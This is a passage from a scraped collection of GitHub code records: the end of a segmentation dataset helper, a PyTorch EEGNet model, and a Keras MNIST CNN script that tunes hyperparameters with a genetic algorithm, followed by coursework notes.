\"img_dir\": self.img_dir_path,\n \"mask_dir\": self.mask_dir_path,\n \"imgs_list\": self.get_img_list() # names 
saved with jpeg format\n },\n fp, indent=2)\n\n\ndef cfg2filter(cfg, ds_lists):\n \"\"\"\n Changes lists of datasets according to the filter\n :param cfg: consists of name, and private settings for each filter\n :param ds_lists: (datasets_lists) dictionary where key is the name\n of dataset and value is a list of imgs\n :return: changed ds_lists\n \"\"\"\n if cfg.name == \"pass\":\n pass\n else:\n msg = f\"Wrong filter \\\"{cfg.name}\\\"\"\n log.critical(msg)\n raise Exception(msg)\n\n return ds_lists\n\n\ndef cfg2datasets(cfg):\n \"\"\"\n :param cfg: dataset_cfg from main config\n consist of:\n 1) device - where to contain returned images\n 2) path - path to the file to read to get list of images for each dataset\n and path to the folder where it contains.\n 3) filter - manipulations with datasets to get new\n 4) bgr_trfm, fgr_trfm, trfm, preproc\n\n :return: dictionary: {dataset_name1: dataset1, ...}\n \"\"\"\n with open(cfg.path, \"r\") as f:\n file_dict = json.load(f)\n\n img_path = file_dict[\"img_path\"]\n mask_path = file_dict[\"mask_path\"]\n ds_lists = cfg2filter(cfg.filter, file_dict[\"dataset_lists\"])\n\n # converting configs to transformations\n bgr_trfm = cfg2trfm(cfg.bgr_trfm)\n fgr_trfm = cfg2trfm(cfg.fgr_trfm)\n trfm = cfg2trfm(cfg.trfm)\n preproc = cfg2trfm(cfg.preproc)\n\n # creating\n datasets = {}\n for ds_name in ds_lists:\n if ds_name == \"validation\":\n datasets[ds_name] = ImgMaskSet(\n log_name=ds_name,\n img_dir_path=img_path, mask_dir_path=mask_path,\n img_list=ds_lists[ds_name],\n bgr_trfm=A.Compose([]), fgr_trfm=A.Compose([]), trfm=A.Compose([]), preproc=preproc,\n device=torch.device(cfg.device)\n )\n else:\n datasets[ds_name] = ImgMaskSet(\n log_name=ds_name,\n img_dir_path=img_path, mask_dir_path=mask_path,\n img_list=ds_lists[ds_name],\n bgr_trfm=bgr_trfm, fgr_trfm=fgr_trfm, trfm=trfm, preproc=preproc,\n device=torch.device(cfg.device)\n )\n\n return datasets\n\n\ndef datasets2json_file(datasets: Dict[str, ImgMaskSet], save_path: str):\n key = [i for i in datasets.keys()][0]\n ds_dict = {\n \"img_path\": datasets[key].img_dir_path,\n \"mask_path\": datasets[key].mask_dir_path\n }\n\n for dataset_name, dataset in datasets.items():\n ds_dict[dataset_name] = dataset.get_img_list()\n\n with open(os.path.join(save_path, \"datasets.json\"), \"w\") as fp:\n json.dump(ds_dict, fp, indent=4)\n\n","repo_name":"ChocoL0rd/ImgSegmentation","sub_path":"new_code/tools/dataset_tools.py","file_name":"dataset_tools.py","file_ext":"py","file_size_in_byte":7890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"329146403","text":"'''\n EEGNet pytorch network\n @param\n f1: first conv input channel\n f2: depthwise conv input channel\n fout: sparable conv input channel\n k1: first conv kernel size\n k2: depthwise conv kernel size\n k3: sparable conv kernel size\n do: dropout probability\n'''\n# Torch\nimport torch\nfrom torchvision import datasets, transforms\nimport torch.utils.data as Data\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.nn as nn\n\nclass EEGNet(torch.nn.Module):\n\t# Activation:\n # 0 -> ELU\n # 1 -> ReLU\n # 2 -> LeakyReLU\n def __init__(self, activation=0, f1=16, f2=32, fout=32, k1=51, k2=2, k3=15, do=0.25):\n super(EEGNet, self).__init__()\n if activation == 0:\n \tactivation_f = nn.ELU()\n elif activation == 1:\n \tactivation_f = nn.ReLU()\n else:\n \tactivation_f = nn.LeakyReLU()\n self.firstConv = nn.Sequential(\n nn.Conv2d(1, f1, kernel_size=(1, k1), stride=(1, 1), 
padding=(0, 25), bias=False),\n            nn.BatchNorm2d(f1, eps=1e-5, momentum=0.1, affine=True, track_running_stats=True)\n        )\n        self.depthwiseConv = nn.Sequential(\n            nn.Conv2d(f1, f2, kernel_size=(k2, 1), stride=(1, 1), groups=16, bias=False),\n            nn.BatchNorm2d(f2, eps=1e-5, momentum=0.1, affine=True, track_running_stats=True),\n            activation_f, \n            nn.AvgPool2d(kernel_size=(1,4), stride=(1, 4), padding=0),\n            nn.Dropout(p=do)\n        )\n        self.separableConv = nn.Sequential(\n            nn.Conv2d(f2, fout, kernel_size=(1, k3), stride=(1, 1), padding=(0, 7), bias=False),\n            nn.BatchNorm2d(fout, eps=1e-5, momentum=0.1, affine=True, track_running_stats=True),\n            nn.ELU(),\n            nn.AvgPool2d(kernel_size=(1,8), stride=(1, 8), padding=0),\n            nn.Dropout(p=do)\n        )\n        self.classify = nn.Sequential(\n            nn.Linear(in_features=fout*23, out_features=2, bias=True)\n        )\n    def forward(self, x):\n        res = self.firstConv(x)\n        res = self.depthwiseConv(res)\n        res = self.separableConv(res)\n        res = res.view(res.size(0), -1)\n        res = self.classify(res)\n        return res\n","repo_name":"sean85914/deep_learning_2019","sub_path":"Lab2/code/eeg.py","file_name":"eeg.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} {"seq_id":"30544926387","text":"\n# %%\n# imports\nimport numpy as np\nfrom sklearn.datasets import fetch_openml\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\n\n# for the random seed\nimport tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\nfrom tensorflow.keras.optimizers import SGD\nfrom tensorflow.keras.optimizers import RMSprop\nfrom tensorflow.keras.optimizers import Adagrad\nfrom tensorflow.keras.initializers import RandomUniform\nfrom time import time\nfrom random import randint\n\n#tf.debugging.set_log_device_placement(False)\n\ntry:\n\ttf.device('/device:GPU')\nexcept:\n\ttf.device('/device:CPU')\n\n# set the random seeds to get reproducible results\nprint(\"#\"*25, \" Code Start\", \"#\"*25,\"\\n\")\nnp_seed = np.random.seed(1)\ntf_seed = tf.random.set_seed(2)\n\n# Load data from https://www.openml.org/d/554\nprint(\"#\"*25, \" Load Data\", \"#\"*25,\"\\n\")\nX, y = fetch_openml('mnist_784', version=1, return_X_y=True)\n\nX, y = X[:1000], y[:1000] # keep only the first 1000 examples so training stays fast\n# reduces the dataset, which has 70000 images, to a smaller set\n\n### deep learning is supervised \n#X = X.reshape(X.shape[0], 28, 28, 1) # rows, height, width, color channel\nX = X.reshape(X.shape[0], 28, 28, 1) # rows, height, width, color channel\n# Normalize\nX = X / 255. 
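# normalize: map 8-bit pixel values onto [0, 1]\n# hypothetical sanity check (illustration only, not in the original script):\n# assert 0.0 <= X.min() and X.max() <= 1.0\n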
# 8bit 2**8 =256 \n\n# number of unique classes\nnum_classes = len(np.unique(y))\ny = y.astype(int)\nprint(\"#\"*25, \" Split Data\", \"#\"*25,\"\\n\")\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.2, random_state=1)\n\nnum_tot = y.shape[0] # number images in the dataset\nnum_train = y_train.shape[0] #number of images for the training phase\nnum_test = y_test.shape[0] #number of images for the test phase\n\nprint(\"#\"*25, \" One Hot Encoding\", \"#\"*25,\"\\n\")\ny_oh = np.zeros((num_tot, num_classes)) #generate a blank array to be filled with one-hotenc\ny_oh[range(num_tot), y] = 1 # replace \n\ny_oh_train = np.zeros((num_train, num_classes))\ny_oh_train[range(num_train), y_train] = 1\n\ny_oh_test = np.zeros((num_test, num_classes))\ny_oh_test[range(num_test), y_test] = 1\n\nprint(\"#\"*25, \" Questions Part I\", \"#\"*25,\"\\n\")\n#### Question 1 Code Answers\nfor num, y_value in enumerate(y):\n\tif num<10:\n\t\tprint(y_value, y_oh[num])\n\nax1 = plt.subplot(131) ### ( row=1 column=3 imgnumber=1 )\nax1.imshow(X[0]) ### X must be in the reshaped form (28,28,1) or (28,28) depeding on the matplot lib version\nax1.set_title( label = \"Y label = \"+ str( y[0] ))\n\nax2 = plt.subplot(132) ### ( row=1 column=1 imgnumber=2 )\nax2.imshow(X[10]) ### X must be in the reshaped form (28,28,1) or (28,28) depeding on the matplot lib version\nax2.set_title( label = \"Y label =\"+ str(y[10]))\n\nax3 = plt.subplot(133) ### ( row=1 column=1 imgnumber=3 )\nax3.imshow(X[20]) ### X must be in the reshaped form (28,28,1) or (28,28) depeding on the matplot lib version\nax3.set_title( label = \"Y label =\"+ str(y[20]))\nplt.show()\n# %%\nprint(\"#\"*25, \" Load CNN Class \", \"#\"*25,\"\\n\")\nclass MyCNN():\n\tdef __init__(self,\n\t\t\t\t X_train, y_oh_train, X_test, y_oh_test, y_test,\n\t\t\t\t activ_func = 'relu', last_layer_func = 'softmax' , ### Functions\n\t\t\t\t standard_kernel = (3, 3), input_shape=(28, 28, 1), ### CNN input\n\t\t\t\t num_classes = 10 , ### CNN output\n\t\t\t\t min_image_kernels = 16, dropout_rate = 0.1, ### CNN parameters\n\t\t\t\t lr = 0.02, decay = 1e-6, momentum = 0.9, ### Optimizer parameters\n\t\t\t\t batch_size = 1000, epochs=1000, ### Batch and Epoch\n\t\t\t\t loss='categorical_crossentropy', optimizer = \"SGD\"): ### loss type\n\n\t\tself.X_train = X_train\n\t\tself.y_oh_train = y_oh_train\n\t\tself.X_test = X_test\n\t\tself.y_oh_test = y_oh_test\n\t\tself.y_test = y_test\n\n\t\tself.activ_func = activ_func\n\t\tself.last_layer_func = last_layer_func\n\t\tself.standard_kernel = standard_kernel\n\t\tself.input_shape = input_shape\n\t\tself.num_classes = num_classes\n\t\tself.dropout_rate = dropout_rate\n\t\tself.mik = min_image_kernels\n\t\tself.lr = lr\n\t\tself.decay=decay\n\t\tself.momentum=momentum\n\t\tself.batch_size = batch_size\n\t\tself.epochs = epochs\n\t\t\n\t\tself.optimizer = optimizer\n\t\t#self.initializer = tf.keras.initializers.Zeros()\n\t\t### under dev. 
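\n\t\t# Hypothetical usage sketch (added illustration; not part of the original class):\n\t\t#   cnn = MyCNN(X_train, y_oh_train, X_test, y_oh_test, y_test,\n\t\t#               epochs=150, batch_size=32, optimizer=\"SGD\")\n\t\t#   cnn.create_model(); cnn.train(); cnn.test()\n\t\t### under dev. 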
= initializer =RandomUniform(minval=0.9, maxval=1., seed=1)\n\n\tdef create_model(self):\n\n\t\tself.model = Sequential()\n\t\tself.model.add( Conv2D( self.mik , (3, 3), \n\t\t\t\t\t\t\t   activation= self.activ_func, \n\t\t\t\t\t\t\t   input_shape= self.input_shape\n\t\t\t\t\t\t\t   ))\n\n\t\t### Conv layer 1 - captures coarse, overall details\n\t\t### the more filters/kernels you add, the more expressive the network usually is\n\t\t### the larger the kernel shape, the larger the image patch each filter sees\n\n\t\t# Max pooling\n\t\tself.model.add( MaxPooling2D ( pool_size = (2, 2) ) )\n\t\tself.model.add(Dropout(self.dropout_rate))\n\n\t\tself.model.add(Conv2D(self.mik * 2 , (3, 3), \n\t\t\t\t\t\t\t\tactivation = self.activ_func\n\t\t\t\t\t\t\t\t)) ### Conv layer 2 - getting more details\n\t\t# Max pooling\n\t\tself.model.add( MaxPooling2D ( pool_size = (2, 2) ) ) ### summarizes information; pooling has no weights\n\n\t\tself.model.add(Flatten())\n\n\t\tself.model.add(Dense( self.mik * 8, \n\t\t\t\t\t\t\t\tactivation = self.activ_func\n\t\t\t\t\t\t\t\t)) ### first hidden layer of the fully connected\n\n\t\tself.model.add(Dropout(self.dropout_rate))\n\n\t\tself.model.add(Dense(self.num_classes, activation=self.last_layer_func\n\t\t\t\t\t\t\t\t)) ### output layer uses the softmax passed in as last_layer_func\n\n\t\tself.sgd = SGD(lr = self.lr, decay = self.decay, momentum = self.momentum, nesterov=True) #####\n\t\tself.rmsp = RMSprop(learning_rate = self.lr, rho=0.9, momentum=0.0, epsilon= self.decay, centered=False)\n\t\tself.adag =Adagrad(learning_rate=self.lr, initial_accumulator_value=0.1, epsilon=self.decay)\n\n\t\tif self.optimizer == \"SGD\":\n\t\t\toptim = self.sgd\n\t\telif self.optimizer == \"RMSProp\":\n\t\t\toptim = self.rmsp\n\t\telif self.optimizer == \"AdaGrad\":\n\t\t\toptim = self.adag\n\n\t\t# Compile the model\n\t\tself.model.compile(loss='categorical_crossentropy', optimizer=optim )\n\n\tdef train(self):\n\t\tstart_time = time()\n\t\tself.history = self.model.fit(self.X_train, \n\t\t\t\t\t\t\t\t\t  self.y_oh_train, \n\t\t\t\t\t\t\t\t\t  batch_size= self.batch_size, \n\t\t\t\t\t\t\t\t\t  epochs=self.epochs, verbose = 0,\n\t\t\t\t\t\t\t\t\t  validation_data = (self.X_test,self.y_oh_test)) ### \n\t\tend_time = time()\n\t\tself.train_time = end_time - start_time\n\n\tdef plot_train(self):\n\t\tplt.plot(self.history.history['loss'])\n\t\tplt.title('model loss')\n\t\tplt.ylabel('loss')\n\t\tplt.xlabel('epoch')\n\t\tplt.legend(['train', 'val'], loc='upper left')\n\t\tplt.show()\n\n\tdef test(self):\n\t\t# Evaluate performance\n\t\tself.test_loss = self.model.evaluate(self.X_test, self.y_oh_test, batch_size= self.batch_size)\n\n\t\tself.predictions_perc = self.model.predict(self.X_test, batch_size = self.batch_size)\n\t\tself.predictions_norm = np.argmax(self.predictions_perc, axis=1) \n\t\t# convert one-hot probabilities back to class labels\n\n\t\tself.accuracy = ( (self.predictions_norm == self.y_test).sum() / self.predictions_norm.shape[0])\n\t\tprint('Accuracy:', self.accuracy, \"\\n\")\n\nprint(\"#\"*25, \" Load Genetic Algorithm Class \", \"#\"*25,\"\\n\")\nclass Genetic_Algorithm():\n\t\n\tdef __init__(self, \n\t\tlr_ls, decay_ls, batch_size_ls, epoch_ls, dropout_ls, optimizer_ls,\n\t\tX_train, y_oh_train, X_test, y_oh_test,y_test, \n\t\tnum_agents = 8): \n\t   \n\t\t### Available Hyperparameters - lr_ls, decay_ls, batch_size_ls, epoch_ls, dropout_ls\n\t\t### Input train and test data - X_train, y_oh_train, X_test, y_oh_test,y_test\n\t\t### Genetic Algorithm hyperparameters - num_agents = 8 \n\t\tself.lr_ls = lr_ls\n\t\tself.decay_ls = decay_ls\n\t\tself.batch_size_ls = batch_size_ls\n\t\tself.epoch_ls = 
epoch_ls\n\t\tself.dropout_ls = dropout_ls\n\t\tself.optimizer_ls = optimizer_ls\n\n\t\tself.tt_gen_pos_01 = len(lr_ls)\n\t\tself.tt_gen_pos_02 = len(decay_ls)\n\t\tself.tt_gen_pos_03 = len(batch_size_ls)\n\t\tself.tt_gen_pos_04 = len(epoch_ls)\n\t\tself.tt_gen_pos_05 = len(dropout_ls)\n\t\tself.tt_gen_pos_06 = len(optimizer_ls)\n\n\t\tself.num_agents = num_agents\n\n\t\tself.X_train = X_train\n\t\tself.y_oh_train = y_oh_train\n\t\tself.X_test = X_test\n\t\tself.y_oh_test = y_oh_test\n\t\tself.y_test = y_test\n\n\t\tself.tested_policies = {}\n\n\t@staticmethod\n\tdef convert_policy_2_name(policy):\n\t\tpolicy_name = str(policy)[1:-1]\n\t\tpolicy_name = policy_name.replace(\", \", \"-\")\n\t\treturn policy_name\n\n\t@staticmethod\n\tdef convert_name_2_policy(policy_name):\n\t\tstr_ls = policy_name.split(\"-\")\n\t\tarray = np.array(str_ls).astype(int)\n\t\tpolicy = array.tolist()\n\t\treturn policy\n\n\t### under dev\n\tdef store_policy_result (self, result):\n\t\tpolicy = result[0]\n\t\t# result = [policy, modelCNN.history, modelCNN.train_time, modelCNN.accuracy, score]\n\n\t\tpolicy_name = self.convert_policy_2_name(policy)\n\n\t\tif policy_name not in self.tested_policies.keys():\n\t\t\tself.tested_policies[policy_name] = [result]\n\t\telse:\n\t\t\tpolicy_results = self.tested_policies[policy_name]\n\t\t\tpolicy_results.append(result)\n\t\t\tself.tested_policies[policy_name] = policy_results\n\t\t\t\t\t\t\t\t\t\t\t\t\n\tdef gen_random_policy(self):\n\t\t\n\t\tgen_pos_01 = randint(0, self.tt_gen_pos_01-1) ###learning_rate\n\t\tgen_pos_02 = randint(0, self.tt_gen_pos_02-1) ###decay_rate\n\t\tgen_pos_03 = randint(0, self.tt_gen_pos_03-1) ###batch_size\n\t\tgen_pos_04 = randint(0, self.tt_gen_pos_04-1) ###epochs\n\t\tgen_pos_05 = randint(0, self.tt_gen_pos_05-1) ###dropout_rate\n\t\tgen_pos_06 = randint(0, self.tt_gen_pos_06-1) ###dropout_rate\n\t\tpolicy = [gen_pos_01, gen_pos_02, gen_pos_03, gen_pos_04, gen_pos_05,gen_pos_06 ]\n\t\t### A policy is composed by index to retrieve values from:\n\t\t# self.lr_ls where policy[0] = lr\n\t\t# self.decay_ls where policy[1] = decay\n\t\t# self.batch_size_ls where policy[2] = batch_size\n\t\t# self.epoch_ls where policy[3] = epochs\n\t\t# self.dropout_ls where policy[4] = dropout_rate\n\t\treturn policy\n\t\n\tdef generate_single_agent (self, policy):\n\n\t\tlr_index = policy[0]\n\t\tdecay_index = policy[1]\n\t\tbs_index = policy[2]\n\t\tep_index = policy[3]\n\t\tdr_index = policy[4]\n\t\topt_index = policy[5]\n\t\t\n\t\tmodelCNN = MyCNN(self.X_train, self.y_oh_train, \n\t\t\t\t\t\t\tself.X_test, self.y_oh_test, self.y_test,\n\t\t\t\t\t\t\tdropout_rate = self.dropout_ls[dr_index], \n\t\t\t\t\t\t\tlr = self.lr_ls[lr_index], \n\t\t\t\t\t\t\tdecay = self.decay_ls[decay_index], \n\t\t\t\t\t\t\tbatch_size = self.batch_size_ls[bs_index], \n\t\t\t\t\t\t\tepochs=self.epoch_ls[ep_index],\n\t\t\t\t\t\t\toptimizer=self.optimizer_ls[opt_index])\n\n\t\tprint('#'*3,' Model Training: \\n')\n\t\tprint('- optimizer : lr= {} decay= {}'.format( self.lr_ls[lr_index], self.decay_ls[decay_index]))\n\t\tprint('- neurons : dropout_rate {}'.format(self.dropout_ls[dr_index]))\n\t\tprint('- batch_size= {} epochs= {} '.format(self.batch_size_ls[bs_index], self.epoch_ls[ep_index]),'#'*3,\"\\n\")\n\n\t\tmodelCNN.create_model()\n\t\tmodelCNN.train()\n\t\tmodelCNN.test()\n\t\t#print(modelCNN.model.summary())\n\t\tresult = [policy, modelCNN.history, modelCNN.train_time, modelCNN.accuracy] \n\t\treturn result\n\n\tdef initialize_agents(self):\n\t\tself.overall_results = 
[]\n\t\t\n\t\tfor _ in range(self.num_agents):\n\t\t\tpolicy = self.gen_random_policy()\n\t\t\tresult = self.generate_single_agent(policy)\n\t\t\t#[:,0]\n\t\t\t#if policy not in self.overall_results: ###\n\t\t\tself.overall_results.append(result)\n\t\t\tself.store_policy_result(result)\n\t\t\n\tdef evaluate_policies(self):\n\t\tresults_array = np.array(self.overall_results)\n\t\taccuracy_arr = results_array[:,3]\n\t\tself.overall_accuracy = accuracy_arr.mean()\n\t\tself.max_accuracy = accuracy_arr.max()\n\n\t\ttime_arr = results_array[:,2]\n\t\tself.overall_time = time_arr.mean()\n\t\tself.min_time = time_arr.min()\n\t\t\n\t\tpolicy_score_sorter = {}\n\t\tsorted_scores = []\n\t\tfor num, result in enumerate(self.overall_results):\n\t\t\tscore = 0 \n\t\t\t\n\t\t\tif result[3] > 0.5:\n\t\t\t\tscore += 10\n\n\t\t\tif result[3] >= self.overall_accuracy:\n\t\t\t\tif result[3] == self.max_accuracy:\n\t\t\t\t\tscore += 20\n\n\t\t\t\telse:\n\t\t\t\t\tscore += 3\n\t\t\t\n\t\t\tif result[2] <= self.overall_time:\n\t\t\t\tif result[2] == self.min_time:\n\t\t\t\t\tscore += 10\n\t\t\t\telse:\n\t\t\t\t\tscore += 5\n\n\t\t\tpolicy_score_sorter[num] = score \n\n\t\tsorted_scores = sorted(policy_score_sorter.items(), \n\t\t\t\t\t\t\t\t key=lambda kv: kv[1], \n\t\t\t\t\t\t\t\t reverse=True)\n\t\tsorted_policies = [] \n\t\t### sorted_policies [(score, policy)] it will sort from highest to lowest\n\t\tfor policy_num, score in sorted_scores:\n\t\t\tsorted_policies.append(self.overall_results[policy_num])\n\t\t\n\t\tself.overall_results = sorted_policies\n\t\n\tdef agent_selection (self):\n\t\t\n\t\tself.parents = []\n\t\t### Make sure odd numbers are not used\n\t\t### The last agent with the worst performance is droppped\n\t\tif len(self.overall_results)%2 != 0:\n\t\t\tself.overall_results.pop(-1)\n\t\t### max pairs is the number of existing agents divided by four\n\t\t### since each pair generates 2 offsprings \n\t\t### we will keep the same number of agents to avoid exponential growth of agent population\n\t\tmax_pairs = int(len(self.overall_results)//4)\n\t\tpossible_parents = len(self.overall_results)-1\n\t\tcount = 0\n\n\t\twhile len(self.parents) < max_pairs:\n\n\t\t\tif count < max_pairs:\n\n\t\t\t\tparent1 = count\n\t\t\t\tparent2 = np.random.choice(possible_parents, size=((1)))[0]\n\t\t\t\tparents_codes = np.array([parent1,parent2])\n\n\t\t\telse:\n\t\t\t\tparents_codes = np.random.choice(possible_parents, size=((2)))\n\n\t\t\tif parents_codes[0] != parents_codes[1]:\n\n\t\t\t\tparent1 = parents_codes[0]\n\t\t\t\tparent2 = parents_codes[1]\n\n\t\t\t\tpolicy1 = np.array(self.overall_results[parent1][0])\n\t\t\t\tpolicy2 = np.array(self.overall_results[parent2][0])\n\t\t\t\t#\n\t\t\t\tself.parents.append([policy1,policy2])\n\t\t\t\tcount += 1\n\n\tdef crossover(self, policy1, policy2,genes_pos = [0, 2, 4]):\n\t\t'''\n\t\tArguments\n\t\t----------\n\t\tpolicy1: parent 1\n\t\tpolicy2: parent 2\n\t\tself.tt_gen_pos_01 = len(lr_ls)\n\t\tself.tt_gen_pos_02 = len(decay_ls)\n\t\tself.tt_gen_pos_03 = len(batch_size_ls)\n\t\tself.tt_gen_pos_04 = len(epoch_ls)\n\t\tself.tt_gen_pos_05 = len(dropout_ls)\n\t\tReturn\n\t\t--------\n\t\tnew_policy: offspring\n\t\t'''\n\t\tpolicyX = policy1.copy()\n\t\tpolicyY = policy2.copy()\n\t\tfor g_pos in genes_pos:\n\t\t\t#from IPython import embed; embed()\n\t\t\tslice_policyX = policyX[g_pos]\n\t\t\tslice_policyY = policyY[g_pos]\n\n\t\t\tpolicyY[g_pos]=slice_policyX\n\t\t\tpolicyX[g_pos]=slice_policyY\n\n\t\tchild_policy1 = policyY\n\t\tchild_policy2 = policyX\n\t\t# 
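worked example (added illustration): with genes_pos=[0, 2, 4],\n\t\t# parents [0, 1, 0, 1, 0, 2] and [1, 0, 1, 0, 1, 0] exchange genes 0, 2 and 4:\n\t\t#   child_policy1 = [0, 0, 0, 0, 0, 0]   (parent2 with parent1's genes at 0, 2, 4)\n\t\t#   child_policy2 = [1, 1, 1, 1, 1, 2]   (parent1 with parent2's genes at 0, 2, 4)\n\t\t# 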
each child keeps the rest of its genes unchanged\n\n\t\treturn child_policy1, child_policy2\n\n\tdef mutation (self, policy, nun_gen_2_mutate = 2, mut_prob_thr=0.05):\n\n\t\tmutation_prob = float(np.random.choice(100,1))/100\n\t\tavailable_positions = np.arange(0, 6)\n\n\t\tif mutation_prob <= mut_prob_thr:\n\n\t\t\tpositions = []\n\t\t\tmutations = []\n\n\t\t\tfor _ in range(nun_gen_2_mutate):\n\n\t\t\t\tposition = int( np.random.choice( 6, 1) ) ## 6 gene positions (0-5)\n\t\t\t\tif position == 0:\n\t\t\t\t\tall_moves = self.tt_gen_pos_01 - 1\n\t\t\t\telif position == 1:\n\t\t\t\t\tall_moves = self.tt_gen_pos_02 - 1\n\t\t\t\telif position == 2:\n\t\t\t\t\tall_moves = self.tt_gen_pos_03 - 1\n\t\t\t\telif position == 3:\n\t\t\t\t\tall_moves = self.tt_gen_pos_04 - 1\n\t\t\t\telif position == 4:\n\t\t\t\t\tall_moves = self.tt_gen_pos_05 - 1\n\t\t\t\telif position == 5:\n\t\t\t\t\tall_moves = self.tt_gen_pos_06 - 1\n\t\t\t\tif all_moves == 0:\n\t\t\t\t\tmove =0\n\t\t\t\telse:\n\t\t\t\t\tmove = int( np.random.choice( all_moves, 1 ) ) \n\n\t\t\t\tif position not in positions:\n\t\t\t\t\tpos_mask = available_positions != position\n\t\t\t\t\tavailable_positions = available_positions[pos_mask]\n\t\t\t\t\tpositions.append(position)\n\t\t\t\telse:\n\t\t\t\t\tposition = int(np.random.choice(available_positions,1))\n\t\t\t\t\tpositions.append(position)\n\t\t\t\t\n\t\t\t\tmutate = [move, position] \n\t\t\t\tmutations.append(mutate)\n\t\t\t\tpolicy[position] = move\n\n\t\treturn policy\n\t\n\tdef update_agents(self):\n\n\t\tself.agent_selection() ### this updates which agents will perform crossover in the self.parents where parents = [ [policy1,policy2], [policyN,policyM]]\n\t\t\n\t\tnew_policies = []\n\t\tfor policy1, policy2 in self.parents:\n\t\t\tchild_policy1, child_policy2 = self.crossover(policy1, policy2)\n\n\t\t\tchild_policy1 = self.mutation(child_policy1)\n\t\t\tchild_policy2 = self.mutation(child_policy2)\n\n\t\t\tnew_policies.append(child_policy1)\n\t\t\tnew_policies.append(child_policy2)\n\n\t\t### drop weaker older agents\n\t\tnew_agents = int(len(new_policies))\n\t\tfor _ in range (new_agents):\n\t\t\tself.overall_results.pop(-1)\n\n\t\t### add new agents\n\t\tprint(\"\\n Add New Policies \")\n\t\tcount =0\n\t\tfor new_policy in new_policies:\n\t\t\tnew_policy_ls = new_policy.tolist() ### convert from numpy back to list format\n\t\t\tnew_result = self.generate_single_agent(new_policy_ls)\n\t\t\t#print(\"new_policy = \", count, new_policy)\n\t\t\t#print(\"overall_results length= \", len(self.overall_results))\n\t\t\t#print(\"shape overall_results = \", np.array(self.overall_results).shape)\n\t\t\tself.overall_results.append(new_result)\n\t\t\tself.store_policy_result(new_result)\n\t\t\tcount += 1\n\t\t\n\tdef show_result(self,result,num):\n\n\t\tpolicy = result[0]\n\n\t\tlr_index = policy[0]; lr = self.lr_ls[lr_index]\n\t\tdecay_index = policy[1]; decay = self.decay_ls[decay_index] \n\t\tbs_index = policy[2]; batch_size = self.batch_size_ls[bs_index]\n\t\tep_index = policy[3]; epochs=self.epoch_ls[ep_index]\n\t\tdr_index = policy[4]; dropout_rate = self.dropout_ls[dr_index] \n\t\topt_index = policy[5]; optimizer = self.optimizer_ls[opt_index] \n\t\t\n\t\thistory = result[1]\n\t\tplt.plot(history.history['loss'])\n\t\tplt.plot(history.history['val_loss'])\n\t\ttitle = 'model number {} time to train= {} seconds and accuracy {} % \\n'.format( num, np.round(result[2], decimals=2), np.round(result[3], decimals = 3)*100)\n\t\ttitle += ' - optimizer: {} lr= {} decay= {} 
\\n'.format(optimizer, lr, decay)\n\t\ttitle += ' - neurons : dropout_rate {} \\n'.format(dropout_rate)\n\t\ttitle += ' - batch_size= {} epochs= {} '.format(batch_size, epochs)\n\t\t\t\t\n\t\tplt.title( title)\n\t\tplt.ylabel('loss')\n\t\tplt.xlabel('epoch')\n\t\tplt.legend(['train', 'val'], loc='upper left')\n\t\tplt.ylim((0,15))\n\t\tplt.show()\n\n\tdef best_models(self, final_models = 3, max_generations = 5):\n\n\t\tcount = 0\n\t\twhile count <= max_generations:\n\t\t\tprint(\"#\"*200)\n\t\t\tprint(\"#\"*25, \" Generation {}\".format(count), \"#\"*25,\"\\n\")\n\t\t\tif count == 0:\n\t\t\t\tself.initialize_agents()\n\t\t\telse:\n\t\t\t\tself.update_agents()\n\t\t\tself.evaluate_policies()\n\t\t\tcount += 1\n\t\t\n\t\tbest_models = []\n\t\tfor num in range(final_models):\n\t\t\tresult = self.overall_results[num]\n\t\t\tself.show_result(result,num)\n\t\t\tbest_models.append(result)\n\t\treturn best_models\n\nprint(\"#\"*25, \" Set hyperparameters lists\", \"#\"*25,\"\\n\")\nlr_ls = [1e-3,1e-4]\ndecay_ls = [1e-6,1e-7]\nbatch_size_ls = [32,500]\nepoch_ls = [150,250]\ndropout_ls = [0.05, 0.01]\noptimizer_ls = [\"SGD\",\"AdaGrad\",\"RMSProp\"]\n\nprint(\"#\"*25, \" Genetic Algorithm Start\", \"#\"*25,\"\\n\")\nga = Genetic_Algorithm(lr_ls,decay_ls,batch_size_ls, epoch_ls, dropout_ls, optimizer_ls,\n\t\t\t\t\t\tX_train, y_oh_train, X_test, y_oh_test, y_test, num_agents=30)\n\nprint(\"#\"*25, \" Run Search For Best Models \", \"#\"*25,\"\\n\")\nbest = ga.best_models(final_models = 10, max_generations = 2)\n\nall_results = ga.tested_policies\n\nfor policy_name in all_results.keys():\n\tpolicy = ga.convert_name_2_policy(policy_name)\n\n\tlr_index = policy[0]\n\tdecay_index = policy[1]\n\tbs_index = policy[2]\n\tep_index = policy[3]\n\tdr_index = policy[4]\n\topt_index = policy[5]\n\t\n\tdropout_rate = ga.dropout_ls[dr_index]\n\tlr = ga.lr_ls[lr_index]\n\tdecay = ga.decay_ls[decay_index]\n\tbatch_size = ga.batch_size_ls[bs_index]\n\tepochs=ga.epoch_ls[ep_index]\n\toptimizer = ga.optimizer_ls[opt_index]\n\n\tfor result in all_results[policy_name]:\n\t\t\n\t\ttitle = '\\n model - time to train= {} seconds and accuracy {} % \\n'.format( np.round(result[2], decimals=2), np.round(result[3], decimals = 3)*100)\n\t\ttitle += ' - optimizer :{} lr= {} decay= {} \\n'.format(optimizer, lr, decay)\n\t\ttitle += ' - neurons : dropout_rate {} \\n'.format(dropout_rate)\n\t\ttitle += ' - batch_size= {} epochs= {} '.format(batch_size, epochs)\n\t\tprint(title)\n\n\n# %%\n\n\n# ### Question 1\n# **The data set**\n# \n# Plot three examples from the data set.\n# * What type of data are in the data set?\n# \n# \n# The MNIST dataset contains grayscale images of handwritten numbers from zero to nine. \n# \t\tWhen they are imported with fetch_openml, an array of shape (n_images, 784) is retrieved. \n# \t\t784 is the flattened form of the image and the input values are pixel values ranging from 0 – 255. \n# \t\tBecause it has only one color channel, it means that the dataset is grayscale.\n# 